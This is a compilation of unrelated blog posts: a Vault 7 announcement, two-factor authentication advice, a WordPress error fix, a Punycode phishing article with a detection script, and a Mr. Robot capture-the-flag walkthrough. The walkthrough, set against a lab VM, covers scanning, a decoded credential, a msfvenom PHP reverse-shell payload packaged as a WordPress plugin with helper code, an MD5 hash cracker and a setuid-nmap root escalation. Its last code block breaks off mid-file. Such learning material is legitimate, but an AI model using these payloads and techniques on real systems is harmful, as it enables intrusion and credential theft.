Vault 7: CIA Hacking Tools Revealed | Wikileaks

If you're in the cyber security business, you will be a lot busier in the days to come securing your network and your customers: WikiLeaks has revealed CIA hacking tools.
Today, Tuesday 7 March 2017, WikiLeaks begins its new series of leaks on the U.S. Central Intelligence Agency. Code-named "Vault 7" by WikiLeaks, it is the largest ever publication of confidential documents on the agency.
The first full part of the series, "Year Zero", comprises 8,761 documents and files from an isolated, high-security network situated inside the CIA's Center for Cyber Intelligence in Langley, Virginia. It follows an introductory disclosure last month of CIA targeting of French political parties and candidates in the lead-up to the 2012 presidential election.
Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized "zero day" exploits, malware remote control systems and associated documentation. This extraordinary collection, which amounts to more than several hundred million lines of code, gives its possessor the entire hacking capacity of the CIA. The archive appears to have been circulated among former U.S. government hackers and contractors in an unauthorized manner, one of whom has provided WikiLeaks with portions of the archive.

KING of Tanks - MultiPlayer Games

Welcome to KING of Tanks Multiplayer Game, Que.com's latest game.
This will be our reference project for future KING of Tanks multiplayer game improvements. We hope you enjoy playing games with us. Keep in mind this game is FREE; you don't have to pay to play.
Things to remember: you can easily come back to this page by going to the following links for quick access. We want you to bookmark this page :).
Continue reading at the KING of Tanks Multiplayer Game web page for more information.

KING.NET Email Address

Manage your business, not your e-mail. We provide reliable uptime, global scalability, and world-class security powered by Google Apps. Doing business in the cloud means you're always current: no more maintenance, upgrades, security patches or hassles, and you can re-allocate your in-house IT to other productive projects.
Got your email @KING.NET? Go to http://mail.king.net and log in with your email address, password and PIN. For your email security, it is highly recommended that you enable Two-Factor Authentication on your account.
Your email is accessible using the following:
  • Any modern internet browser e.g. Internet Explorer (IE), Google Chrome, Mozilla Firefox, Safari and others.
  • Smart Phones e.g. iPhone, Android, etc.
Examples of email addresses to register: please note that an email address @KING.NET is a premium identity for a very important person like yourself. You can only get your own email @KING.NET here. Some examples of premium email addresses using @KING.NET:
  • Saudi@King.net
  • Charles@King.net
  • Royal@King.net
  • James@King.net
  • Peter@King.net
  • and of course your own Name@KING.NET

Enable Two-Factor Authentication to protect your Email Account.

Your email address is the center of your security world. It is highly recommended that you enable Two-Factor Authentication to reduce the risk of someone getting into your email through a spear phishing attack, digging up the caches of passwords that sit in most mailboxes, and similar email attacks. As an example, the attacker behind the DNC email breach used a fake password reset request delivered by spear phishing and was able to obtain the victim's email password. With Two-Factor Authentication enabled, a stolen password alone is not enough: the login also requires a verification code the attacker does not have, so the attack stops there.



Two-Factor Authentication (also called 2-Step Verification) adds an extra layer of security to your email account by requiring a verification code in addition to your username and password when you sign in. It helps protect an account from unauthorized access should someone obtain the password: even if the password is cracked, guessed, or otherwise stolen, an attacker cannot sign in without the second factor. The verification code is something only the user can obtain, for example from their own mobile phone.

Requirement. To use Two-Factor Authentication you need a mobile phone that can receive the verification code by text message or phone call, or the Google Authenticator mobile app, which generates the code on the phone itself without needing network coverage. The app-generated code is the better choice: text messages can be intercepted or redirected by a SIM swap, and both kinds of code can be phished in real time, so never type a code into a page you reached from an email link.

How to enable Two-Factor Authentication?
For Gmail or a Google Apps (white-label) domain:
  • Log in to your email: go to https://www.gmail.com and enter your email address and password.
  • Click your name icon (upper right corner), then click My Account.
Google provides a detailed step-by-step procedure on how to enable it. You will see Security Checkup; click Get Started and follow the steps.
  1. Check your recovery information.
  2. Check your connected devices
  3. Check your account permissions
  4. Check your app passwords. These are separate passwords for clients such as MS Outlook or other email readers that cannot prompt for a verification code; each one bypasses the second factor, so create them only where needed and revoke any you no longer use.
  5. Check your Two-Factor settings

Have a safe computing experience.

Source: Que.com

FIXED. Fatal error: Call to a member function do_all_hook() on a non-object in /home/public_html/wp-includes/plugin.php on line 837

The latest version of WordPress is v4.7. It is always recommended to upgrade to the latest release to minimize vulnerabilities (exposure) and to get the improvements to the content management system.
Always back up before you upgrade: copy your WordPress files and download a dump of the database. This gives you a way to roll back in case you run into an "unknown" issue; upgrades are not always perfect.
During the upgrade to v4.7 of one of my customers' websites, I got this error.
Fatal error: Call to a member function do_all_hook() on a non-object in /home/public_html/wp-includes/plugin.php on line 837
A quick fix is to re-upload the plugin.php file from the old backup to the /wp-includes folder. This works, but it leaves the site running a mix of old and new core files.
I wanted to use the latest plugin.php, not the old copy, so I searched for others who had hit the same error when upgrading to the latest version of WordPress. No surprise: the issue and alternative fixes were already being discussed.
The fix that worked: disable the file /wp-content/object-cache.php by renaming it to object-cache.DISABLED.php (deleting it works as well). object-cache.php is a WordPress "drop-in" that replaces the built-in object cache and is usually installed by a caching plugin. WordPress 4.7 rebuilt the plugin API around the WP_Hook class, and an old drop-in that touches the global $wp_filter array directly can leave entries that are not WP_Hook objects, which is exactly what this fatal error reports. After disabling it, check whether your caching plugin has an update before re-enabling it.
I re-uploaded the latest plugin.php to the /wp-includes/ folder, tested the website, and was happy with the result.
I hope this helps.
Source: Que.com

A new phishing attack targeting Office 365 business email users - EM @QUE.com

A new phishing attack targeting Office 365 business email users was found using Punycode to slip past both Microsoft's default security and desktop email filters, Avanan security researchers warn.
The attack is meant to steal Office 365 credentials and abuses a weakness in how the Office 365 anti-phishing and URL reputation layers handle Punycode. It starts with a fake FedEx email containing benign-looking URLs that lead users to a malicious website.
By using Punycode and leveraging that flaw in the phish-detection engine, the same link is effectively two different domains: the plain-ASCII one that the Office 365 check evaluates (and finds safe) and the Unicode one the browser actually visits (malicious).
The underlying issue is that Office 365's default security treats the domain as plain ASCII when checking whether it is legitimate. Because all modern browsers support Unicode domain names, the address is converted to its Unicode form when opened in the browser. That address is malicious and presents a fake Office 365 login page to steal the user's credentials.
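The two-faced address the article describes can be checked mechanically: decode the A-label form (xn--...) to the Unicode the browser will show, then ask whether that rendering mixes scripts or is a letter-for-letter look-alike of a domain you care about. The block below is an added example, not Avanan's or Microsoft's code; the confusables table is a small hand-picked subset of Unicode TR39, PROTECTED_DOMAINS is a hypothetical watch list, and the look-alike hosts are constructed at runtime from code points.

```python
import unicodedata
from urllib.parse import urlsplit

# Hand-picked subset of the Unicode TR39 confusables table: Cyrillic letters that
# render like Latin ones. Constructed for this example; a production filter should
# load the full confusables.txt.
CONFUSABLES = {
    chr(0x0430): "a",  # CYRILLIC SMALL LETTER A
    chr(0x0435): "e",  # CYRILLIC SMALL LETTER IE
    chr(0x043E): "o",  # CYRILLIC SMALL LETTER O
    chr(0x0440): "p",  # CYRILLIC SMALL LETTER ER
    chr(0x0441): "c",  # CYRILLIC SMALL LETTER ES
    chr(0x0443): "y",  # CYRILLIC SMALL LETTER U
    chr(0x0445): "x",  # CYRILLIC SMALL LETTER HA
    chr(0x0455): "s",  # CYRILLIC SMALL LETTER DZE
    chr(0x0456): "i",  # CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I
    chr(0x0458): "j",  # CYRILLIC SMALL LETTER JE
    chr(0x04CF): "l",  # CYRILLIC SMALL LETTER PALOCHKA
}

# Hypothetical watch list of brands the mail filter protects.
PROTECTED_DOMAINS = {"apple.com", "fedex.com", "microsoft.com", "office.com"}

# Constructed look-alike hosts, built from code points so they cannot be mistyped.
LOOKALIKE_APPLE = "".join(chr(c) for c in (0x0430, 0x0440, 0x0440, 0x04CF, 0x0435)) + ".com"
LOOKALIKE_MICROSOFT = "micr" + chr(0x043E) + "soft.com"   # one Cyrillic o among Latin letters


def label_scripts(label: str) -> set:
    """Approximate the script of each letter from its Unicode name (LATIN, CYRILLIC, ...)."""
    return {unicodedata.name(ch, "UNKNOWN").split()[0] for ch in label if ch.isalpha()}


def skeleton(host: str) -> str:
    """Replace confusable letters with their Latin look-alikes (a TR39-style skeleton)."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in host)


def analyze_url(url: str) -> dict:
    """Show both faces of the host: the ASCII A-label form an ASCII-only reputation
    check compares, and the Unicode U-label form the browser displays."""
    host = (urlsplit(url).hostname or "").rstrip(".")
    ascii_host = host.encode("idna").decode("ascii")          # e.g. xn--....com
    unicode_host = ascii_host.encode("ascii").decode("idna")  # what the address bar shows
    reasons = []
    for label in unicode_host.split("."):
        scripts = label_scripts(label)
        if len(scripts) > 1:
            reasons.append(f"mixed scripts {sorted(scripts)} in label {label!r}")
    look = skeleton(unicode_host)
    if look != unicode_host and look in PROTECTED_DOMAINS:
        reasons.append(f"confusable for protected domain {look}")
    return {"ascii_host": ascii_host, "unicode_host": unicode_host,
            "is_idn": ascii_host != unicode_host, "skeleton": look,
            "suspicious": bool(reasons), "reasons": reasons}


if __name__ == "__main__":
    for sample in ("https://www.fedex.com/track?id=1",
                   f"https://{LOOKALIKE_APPLE}/login",
                   f"https://{LOOKALIKE_MICROSOFT}/"):
        print(analyze_url(sample))
```

The article's point is visible in the returned dict: ascii_host is what an ASCII-only reputation check sees, unicode_host is what the user sees, and they are the same string only when is_idn is False. A filter that compares ascii_host against a blocklist will never match a freshly registered xn-- domain; comparing the skeleton against the brands you protect does.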
How to protect against phishing email or spear phishing email intended for the big fish in our organization?
  • Do not click in any links asking you to reset your password. Make it as a habit, never click on a link from your email :)
  • Use Two-Factor Authentication. I highly recommend that you use Two-Factor authentication when available, for your bank accounts, social networks e.g. LinkedIn, Facebook, etc. (The Two-Factor authentication is not available to Kiosk Email user.)
The phishing email is the same old method: a malicious person asks you to change your bank account password, warns of a compromised bank account or money deposited to your account, announces a UPS delivery or a social media notification, offers free Redskins tickets or free Washington Wizards tickets, and many other variations of fake email. According to PhishMe, 91% of cyber attacks start with a phishing email. The hacked accounts of high-profile DNC staff were compromised through phishing emails. The method is cheap, hard to detect, and easy to deploy.
Security awareness of everyone is important to minimize our exposure.
What is the worst case scenario if you click on a “bait” links?
  • The malicious user will have access to your account. For example, your email, social media, banks account, etc.
  • Or the malicious user will have full control of your computer through a "reverse shell", where they can see all your files, install a back door to get back in, use your webcam, use your computer as a bot for DDoS attacks, anything they want.
What to do if you accidentally click a “bait” links?
  • When you click a "bait" link or open a bad attachment, you may think nothing happened and move on with your routine tasks, but the malicious code has already executed in the background; you will not notice it, that is how it is designed. Don't ignore this simple mistake. Disconnect the workstation from the network right away: that cuts off any session the click opened. A reboot also ends the session, but it does not remove anything the attacker installed to get back in, and it wipes the memory evidence an incident responder would want, so disconnect first and reboot only if told to.
  • Scan your workstation with your anti-virus/anti-malware software.
  • Report to your immediate supervisor or post in our comment below. Our community is willing to help.
The Center for Development of Security Excellence (CDSE.edu) website provides a fun way to test your awareness against Phishing Scams. Go to http://www.cdse.edu/shorts/cybersecurity.html# website, check the Phishing Scams video “Phishing Scams Avoid the Bait” and have fun.

CTF – Hacking Mr. Robot by EM @QUE.com

Another learning experience to improve my penetration testing skills: hacking the Mr. Robot virtual machine as my target.
My private network for this penetration testing exercise.
  • Kali Linux, my tool to exploit the target machine. IP Address 192.168.159.131
  • Mr.Robot, my target machine. IP Address: Unknown
Let's begin. My objective is to find the three hidden keys.
Sponsored by Termed.com Life Insurance.
I have no knowledge of my target machine's (Mr. Robot) IP address, so let me begin by running nmap. Of course, you can also use another network discovery tool to scan your network; I prefer nmap because it is already on my pentest machine.
root@kali:~# nmap -T4 192.168.159.0/24
Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-30 10:41 EST
Nmap scan report for 192.168.159.130
Host is up (0.00037s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
443/tcp open https
MAC Address: 00:0C:29:F8:73:37 (VMware)
Nmap scan report for 192.168.159.254
Host is up (0.00015s latency).
All 1000 scanned ports on 192.168.159.254 are filtered
MAC Address: 00:50:56:F4:2B:CA (VMware)
Nmap scan report for 192.168.159.131
Host is up (0.0000050s latency).
All 1000 scanned ports on 192.168.159.131 are closed
Nmap done: 256 IP addresses (3 hosts up) scanned in 39.00 seconds
root@kali:~#
I discovered my target machine's IP address, 192.168.159.130, and its open ports. That's basic enumeration: scanning my private network. (192.168.159.131 is the Kali box itself, and 192.168.159.254 with every port filtered is a VMware virtual adapter, so both can be ignored.)
Ports 80 and 443 are interesting places to start poking around. Let's see what's on this website. I'm calling Firefox directly from the command prompt; of course you can simply click the Firefox icon and enter the IP address of the web server. It's cool to use the CLI to run a command.
root@kali:~/KING.NET/mr.robot# firefox http://192.168.159.130/
The website starts loading JavaScript that looks like a Linux environment booting.
Opening the source code, I got this fancy "You are not alone".
Checking to see if I can use any of this information to hack Mr.Robot box.
Nothing so far. I will come back to this webpage later on.
Let's use dirb, a directory brute-forcer, to learn more about our target website.
root@kali:~/KING.NET/mr.robot# dirb http://192.168.159.130/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Nov 30 19:18:31 2016
URL_BASE: http://192.168.159.130/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.159.130/ ----
==> DIRECTORY: http://192.168.159.130/0/
==> DIRECTORY: http://192.168.159.130/admin/
+ http://192.168.159.130/atom (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.159.130/audio/
==> DIRECTORY: http://192.168.159.130/blog/
==> DIRECTORY: http://192.168.159.130/css/
+ http://192.168.159.130/dashboard (CODE:302|SIZE:0)
+ http://192.168.159.130/favicon.ico (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.159.130/feed/
==> DIRECTORY: http://192.168.159.130/image/
==> DIRECTORY: http://192.168.159.130/Image/
==> DIRECTORY: http://192.168.159.130/images/
+ http://192.168.159.130/index.html (CODE:200|SIZE:1077)
+ http://192.168.159.130/index.php (CODE:301|SIZE:0)
+ http://192.168.159.130/intro (CODE:200|SIZE:516314)
==> DIRECTORY: http://192.168.159.130/js/
http://192.168.159.130/license (CODE:200|SIZE:309)
http://192.168.159.130/login (CODE:302|SIZE:0)
+ http://192.168.159.130/page1 (CODE:301|SIZE:0)
+ http://192.168.159.130/phpmyadmin (CODE:403|SIZE:94)
+ http://192.168.159.130/rdf (CODE:301|SIZE:0)
+ http://192.168.159.130/readme (CODE:200|SIZE:64)
http://192.168.159.130/robots (CODE:200|SIZE:41)
http://192.168.159.130/robots.txt (CODE:200|SIZE:41)
+ http://192.168.159.130/rss (CODE:301|SIZE:0)
+ http://192.168.159.130/rss2 (CODE:301|SIZE:0)
+ http://192.168.159.130/sitemap (CODE:200|SIZE:0)
http://192.168.159.130/sitemap.xml (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.159.130/video/
==> DIRECTORY: http://192.168.159.130/wp-admin/
+ http://192.168.159.130/wp-config (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.159.130/wp-content/
+ http://192.168.159.130/wp-cron (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.159.130/wp-includes/
+ http://192.168.159.130/wp-links-opml (CODE:200|SIZE:227)
+ http://192.168.159.130/wp-load (CODE:200|SIZE:0)
http://192.168.159.130/wp-login (CODE:200|SIZE:2627)
--- snip --- dirb still running.
I cancelled it; I have enough information to start digging. There is a lot in these results: sub-folders and files such as /admin, /blog, /license, /phpmyadmin, /wp-admin, /wp-login, /wp-config, etc. The wp-* paths tell me the Mr. Robot website is running the WordPress content management system. Nice.
Checking the following sub-folder.
root@kali:~/KING.NET/mr.robot# firefox http://192.168.159.130/license
A webpage with this content "what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?"
Continue scrolling down to the end of the page to see this text, "do you want a password or something?", and this code.
ZWxsaW90OkVSMjgtMDY1Mgo=
Copied to nano and save as 1stdump.txt to check for base64. Run base64 -d -i 1stdump.txt
root@kali:~/KING.NET/mr.robot# nano 1stdump.txt
root@kali:~/KING.NET/mr.robot# base64 -d -i 1stdump.txt
elliot:ER28-0652
root@kali:~/KING.NET/mr.robot#
Looks like we have a username, elliot, and maybe a password, ER28-0652. Let's see whether this account information works as a login on the Mr. Robot virtual machine itself.
No luck! Continue hacking the box :(.
Let me try the account at http://192.168.159.130/wp-admin instead. Success!
Checking the users, "elliot" is also an Administrator. Jackpot! There is another user, micho05654, with the Subscriber role. I will ignore the subscriber and focus on elliot as administrator.
Now I can control this box from here. With administrator rights in WordPress I can go further and get a reverse shell on the host: an administrator can upload and activate plugins, and a plugin is just PHP that the web server executes. Let the Kali virtual machine do the work for us. Click Applications, Exploitation Tools, then MSF Payload. It opens the MSFVenom Payload Creator in a new terminal window, where I run the command below.
root@kali:~# msfpc php 192.168.159.131 443 msf reverse stageless tcp
This command tells msfpc to build a payload of type php; 192.168.159.131 is the attacker's IP address and 443 the port to connect back to; msf selects a Meterpreter payload so I get the full power of Metasploit; reverse makes the target connect back to the attacker; stageless produces a complete stand-alone payload rather than a small stager that downloads the rest; and tcp is the standard transport for connecting back. I hope that makes sense; otherwise type --help for more details.
root@kali:~# msfpc php 192.168.159.131 443 msf reverse stageless tcp
[*] Msfvenom Payload Creator (MPC v1.4.3)
[i] IP: 192.168.159.131
[i] PORT: 443
[i] TYPE: php (php/meterpreter_reverse_tcp)
[i] CMD: msfvenom -p php/meterpreter_reverse_tcp -f raw \
--platform php -e generic/none -a php LHOST=192.168.159.131 LPORT=443 \
> '/root/php-meterpreter-stageless-reverse-tcp-443.php'
[i] php meterpreter created: '/root/php-meterpreter-stageless-reverse-tcp-443.php'
[i] MSF handler file: '/root/php-meterpreter-stageless-reverse-tcp-443-php.rc'
[i] Run: msfconsole -q -r '/root/php-meterpreter-stageless-reverse-tcp-443-php.rc'
[?] Quick web server (for file transfer)?: python -m SimpleHTTPServer 8080
[*] Done!
After running the MSFVenom Payload Creator, the program generated two files:
  1. php-meterpreter-stageless-reverse-tcp-443.php
  2. php-meterpreter-stageless-reverse-tcp-443-php.rc
And the command to run "msfconsole -q -r '/root/php-meterpreter-stageless-reverse-tcp-443-php.rc'". All ready for me to execute.
root@kali:~# msfconsole -q -r '/root/php-meterpreter-stageless-reverse-tcp-443-php.rc'
My listening (attacker) machine ready and waiting for connection.
resource (/root/php-meterpreter-stageless-reverse-tcp-443-php.rc)> run -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.159.131:443
[*] Starting the payload handler...
msf exploit(handler) >
The MSFVenom Payload Creator also suggests a quick web server (python -m SimpleHTTPServer 8080) for transferring the file to a target. I will not use it in this scenario because I already have administrator access to the WordPress site; all I need to do is install my payload through WordPress as a plugin. At this point I could create havoc in the WordPress installation by deleting content, but the main goal is to own the box (pwn to root, or pwn 2 r00t).
I edit the PHP file to add the plugin header WordPress looks for (it scans the first 8 KB of the main plugin file for a "Plugin Name:" line). Here's the updated PHP file. The header sits before the payload's own opening <?php tag, so PHP will print the comment block as plain text in the response; that does no harm to the reverse shell.
/*
Plugin Name: Pwn-to-Root
Plugin URI: http://www.king.net
Description: A demo using WordPress to establish a reverse shell.
Author: EM @ KING.NET
Version: v1.0
Author URI: http://www.king.net
*/
//<?php if (!isset($GLOBALS['channels'])) { $GLOBALS['channels'] = array(); } if (!isset$
Then zip the php file.
root@kali:~# zip php-meterpreter-stageless-reverse-tcp-443.zip php-meterpreter-stageless-reverse-tcp-443.php
adding: php-meterpreter-stageless-reverse-tcp-443.php (deflated 76%)
root@kali:~#
The payload is now ready. I can use the zip file to upload as plugin in WordPress management console. Let's go back to the WordPress admin page. In Plugin, click add new plugin, then upload the zip file. Browse the zip file, click Install Now. Wait to complete the upload.
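Packaging the payload by hand, as above, means editing msfvenom's output. The following added example (my code, not from the walkthrough or from Metasploit) automates the step and sidesteps the edit by making the plugin's main file a one-line require of the untouched payload. The payload here is a constructed stand-in for the generated php/meterpreter_reverse_tcp file, the slug and name strings are arbitrary, and wordpress_plugin_name approximates the header scan WordPress runs over the first 8 KB of the main file.

```python
import io
import re
import zipfile
from typing import List, Optional

# WordPress reads only the first 8 KB of the main plugin file when looking for headers.
WP_HEADER_SCAN_BYTES = 8192
# Approximation of the pattern WordPress applies to that chunk.
PLUGIN_NAME_RE = re.compile(rb"^[ \t/*#@]*Plugin Name:\s*(.+?)\s*$", re.M)

# Constructed stand-in for the msfvenom-generated payload (the real file starts the
# same way and is thousands of bytes long).
DEMO_PAYLOAD = b"/*<?php /**/ echo 'stand-in for php/meterpreter_reverse_tcp';\n"


def plugin_header(name: str, description: str, author: str, version: str = "1.0") -> str:
    """Header block WordPress parses, placed inside the <?php tag so that nothing is
    echoed to the HTTP response before the payload runs."""
    return ("<?php\n/*\n"
            f"Plugin Name: {name}\n"
            f"Description: {description}\n"
            f"Author: {author}\n"
            f"Version: {version}\n"
            "*/\n")


def build_plugin_zip(slug: str, payload_php: bytes, name: str,
                     description: str = "", author: str = "") -> bytes:
    """Package <slug>/<slug>.php (header + require) and <slug>/payload.php (the generated
    payload byte for byte, so nothing inside it has to be hand-edited) into one zip."""
    main_php = plugin_header(name, description, author) + "require __DIR__ . '/payload.php';\n"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{slug}/{slug}.php", main_php)
        zf.writestr(f"{slug}/payload.php", payload_php)
    return buf.getvalue()


def zip_entries(zip_bytes: bytes) -> List[str]:
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return sorted(zf.namelist())


def zip_entry(zip_bytes: bytes, path: str) -> bytes:
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return zf.read(path)


def wordpress_plugin_name(zip_bytes: bytes, slug: str) -> Optional[str]:
    """Recover the plugin name the way WordPress would: scan the first 8 KB of the
    main file for a 'Plugin Name:' header line."""
    head = zip_entry(zip_bytes, f"{slug}/{slug}.php")[:WP_HEADER_SCAN_BYTES]
    match = PLUGIN_NAME_RE.search(head)
    return match.group(1).decode() if match else None


if __name__ == "__main__":
    blob = build_plugin_zip("pwn-to-root", DEMO_PAYLOAD, "Pwn-to-Root",
                            "A demo using WordPress to establish a reverse shell.", "EM @ KING.NET")
    with open("pwn-to-root.zip", "wb") as fh:
        fh.write(blob)
    print(zip_entries(blob), wordpress_plugin_name(blob, "pwn-to-root"))
```

The payload executes whenever the main file is loaded, so activating the plugin (and, once it is active, any page load) is what opens the connection; the browser request hangs while the session lives. Remove the plugin when finished. On the defensive side, an unexpected plugin directory whose PHP calls fsockopen, socket_create or eval is exactly this attack.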
I've already started the listening machine (above), so all I need to do is click Activate Plugin to create the reverse access. When I check my listening machine, I see our session.
[*] Meterpreter session 1 opened (192.168.159.131:443 -> 192.168.159.130:39959) at 2016-12-03 23:39:58 -0500
From the listening machine, type "sessions" to list the active sessions.
msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter php/linux daemon (1) @ linux 192.168.159.131:443 -> 192.168.159.130:39959 (192.168.159.130)
msf exploit(handler) >
Type "help sessions" to see options on how to connect using sessions.
msf exploit(handler) > help sessions
Usage: sessions [options]
Active session manipulation and interaction.
OPTIONS:
-K Terminate all sessions
-c <opt> Run a command on the session given with -i, or all
-h Help banner
-i <opt> Interact with the supplied session ID
-k <opt> Terminate sessions by session ID and/or range
-l List all active sessions
-q Quiet mode
-r Reset the ring buffer for the session given with -i, or all
-s <opt> Run a script on the session given with -i, or all
-t <opt> Set a response timeout (default: 15)
-u <opt> Upgrade a shell to a meterpreter session on many platforms
-v List sessions in verbose mode
-x Show extended information in the session table
Many options allow specifying session ranges using commas and dashes.
For example: sessions -s checkvm -i 1,3-5 or sessions -k 1-2,5,6
Now, I can connect to session id 1 using -i option for Interact with supplied session ID
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
We are now in the session. From here I can run commands on the Mr. Robot machine, e.g. ls, pwd.
meterpreter > ls
---snip --
00644/rw-r--r-- 19642 fil 2015-09-16 06:49:06 -0400 user-new.php
100644/rw-r--r-- 16552 fil 2015-09-16 06:49:06 -0400 users.php
100644/rw-r--r-- 16143 fil 2015-09-16 06:49:06 -0400 widgets.php
meterpreter > pwd
/opt/bitnami/apps/wordpress/htdocs/wp-admin
meterpreter >
Let me check the home directory.
meterpreter > ls /home
Listing: /home
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2015-11-13 02:20:08 -0500 robot
I see robot directory, continue digging ...
meterpreter > ls
Listing: /home
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2015-11-13 02:20:08 -0500 robot
meterpreter > cd robot
meterpreter > ls
Listing: /home/robot
====================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100400/r-------- 33 fil 2015-11-13 02:28:21 -0500 key-2-of-3.txt
100644/rw-r--r-- 39 fil 2015-11-13 02:28:21 -0500 password.raw-md5
meterpreter >
In /home/robot directory, two files found
  1. key-2-of-3.txt
  2. password.raw-md5
I can't read "key-2-of-3.txt" because it is readable (r--------) only by its owner, user "robot", and the web server I am running as is a different user; see the error below. "password.raw-md5", on the other hand, is world-readable (rw-r--r--).
meterpreter > cat key-2-of-3.txt
[-] core_channel_open: Operation failed: 1
meterpreter > cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
meterpreter >
"robot:c3fcd3d76192e4007dfb496cca67e13b" is username:hash. The file name says raw-md5, i.e. an unsalted MD5 digest, so it cannot be "decrypted", but it can be looked up: the online hash database at hashkiller.co.uk maps c3fcd3d76192e4007dfb496cca67e13b to "abcdefghijklmnopqrstuvwxyz". Wow, the password is that basic. Had I run a password cracker with a wordlist earlier, I'm sure I would have had it in under 2 minutes. Anyway, let me switch to user robot on the Mr. Robot box with this username (robot) and password (abcdefghijklmnopqrstuvwxyz).
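The hash lookup above works because the file is raw (unsalted) MD5: the same password always yields the same digest, so one table of known digests, or one pass over a wordlist, serves every user at once. The following is an added example, not code from the walkthrough or from any cracking tool: a small offline cracker for password.raw-md5 style files. The hash line is the one from the box; the wordlist is a constructed five-entry stand-in for a file such as fsocity.dic, and the mutation rules are a deliberately tiny subset of what hashcat or John apply.

```python
import hashlib
from typing import Dict, Iterable, Iterator, List, Optional

# Constructed inputs: the raw-MD5 line found in /home/robot on the box, and a tiny
# stand-in wordlist (fsocity.dic on the box is several megabytes and full of repeats).
HASH_FILE = "robot:c3fcd3d76192e4007dfb496cca67e13b\n"
WORDLIST = ["password", "abcdefghijklmnopqrstuvwxyz", "elliot",
            "abcdefghijklmnopqrstuvwxyz", "Robot"]


def parse_raw_md5(text: str) -> Dict[str, str]:
    """Parse 'user:hexdigest' lines; blank lines, comments and malformed digests are skipped."""
    targets: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, digest = line.split(":", 1)
        digest = digest.strip().lower()
        if len(digest) == 32 and all(c in "0123456789abcdef" for c in digest):
            targets[user.strip()] = digest
    return targets


def dedupe(words: Iterable[str]) -> List[str]:
    """Drop repeated candidates while keeping order; hashing a word twice is pure waste."""
    seen, unique = set(), []
    for word in words:
        word = word.rstrip("\r\n")
        if word and word not in seen:
            seen.add(word)
            unique.append(word)
    return unique


def mutations(word: str) -> Iterator[str]:
    """Deliberately small rule set: as typed, lower-case, capitalised, trailing digit."""
    yield word
    yield word.lower()
    yield word.capitalize()
    for digit in "0123456789":
        yield word + digit


def crack_raw_md5(hash_text: str, words: Iterable[str]) -> Dict[str, Optional[str]]:
    """Unsalted MD5 means one digest per candidate can be checked against every target."""
    targets = parse_raw_md5(hash_text)
    users_by_digest: Dict[str, List[str]] = {}
    for user, digest in targets.items():
        users_by_digest.setdefault(digest, []).append(user)
    found: Dict[str, Optional[str]] = {user: None for user in targets}
    remaining = set(users_by_digest)
    for word in dedupe(words):
        for candidate in mutations(word):
            digest = hashlib.md5(candidate.encode("utf-8")).hexdigest()
            if digest in remaining:
                for user in users_by_digest[digest]:
                    found[user] = candidate
                remaining.discard(digest)
                if not remaining:
                    return found
    return found


if __name__ == "__main__":
    # Real use: crack_raw_md5(open("password.raw-md5").read(), open("fsocity.dic", errors="replace"))
    print(crack_raw_md5(HASH_FILE, WORDLIST))
```

Deduplicating the wordlist first is not cosmetic: on a multi-megabyte dictionary full of repeats it is the difference between seconds and minutes. Once the plaintext is known, note that the way in was a world-readable hash file; that is the finding to write up, not the weak password alone.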
Successfully logged in as robot with password abcdefghijklmnopqrstuvwxyz. Run ls to check the directory listing.
Run "cat key-2-of-3.txt" to view the file.
Check if I can "ls /root"
Oops ... it seems I need more research to get root access.
After long hours of research and reading other penetration testing websites/blogs ...
I checked the nmap binary on the Mr. Robot box. It is an old version that still supports --interactive, and it is installed setuid root, so a command spawned from its interactive prompt with !command runs with root's effective uid.
First I tried "!bash" to run a shell command.
No luck: bash drops an effective uid that differs from the real uid when it starts (unless run with -p), so I was still robot.
Now trying "!sh", which keeps the effective uid. (Type "exit" to get out of the shell and back to nmap.)
Success with !sh. Checking /root/firstboot_done, it is empty, and /root/key-3-of-3.txt gives our key "04787ddef27c3dee1ee161b21670b4e4".
At this point I have found 2 of the 3 keys:
  1. key-1-of-3.txt - ?
  2. key-2-of-3.txt "822c73956184f694993bede3eb39f959"
  3. key-3-of-3.txt "04787ddef27c3dee1ee161b21670b4e4".
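The !sh trick above is a symptom of a general problem: any setuid-root binary that can spawn a shell or read arbitrary files is a root shell waiting to happen, and finding them is the first thing to do after landing as an unprivileged user (find / -perm -4000 -type f 2>/dev/null). The block below is an added example, not from the walkthrough or from any tool: the same search in Python with a constructed shortlist of shell-capable binaries (GTFOBins is the real catalogue). demo() builds a throwaway tree containing a setuid nmap so the code can be exercised without root; require_root is relaxed there only because the demo files are not root-owned.

```python
import os
import stat
import tempfile
from typing import Iterable, List, Tuple

# Binaries that give a shell or arbitrary file read/write when they run setuid root.
# Constructed shortlist for this example; GTFOBins keeps the full catalogue.
SHELL_CAPABLE = {"nmap", "vim", "vi", "find", "bash", "sh", "python", "python2", "python3",
                 "perl", "ruby", "less", "more", "awk", "tar", "cp", "env", "nano"}
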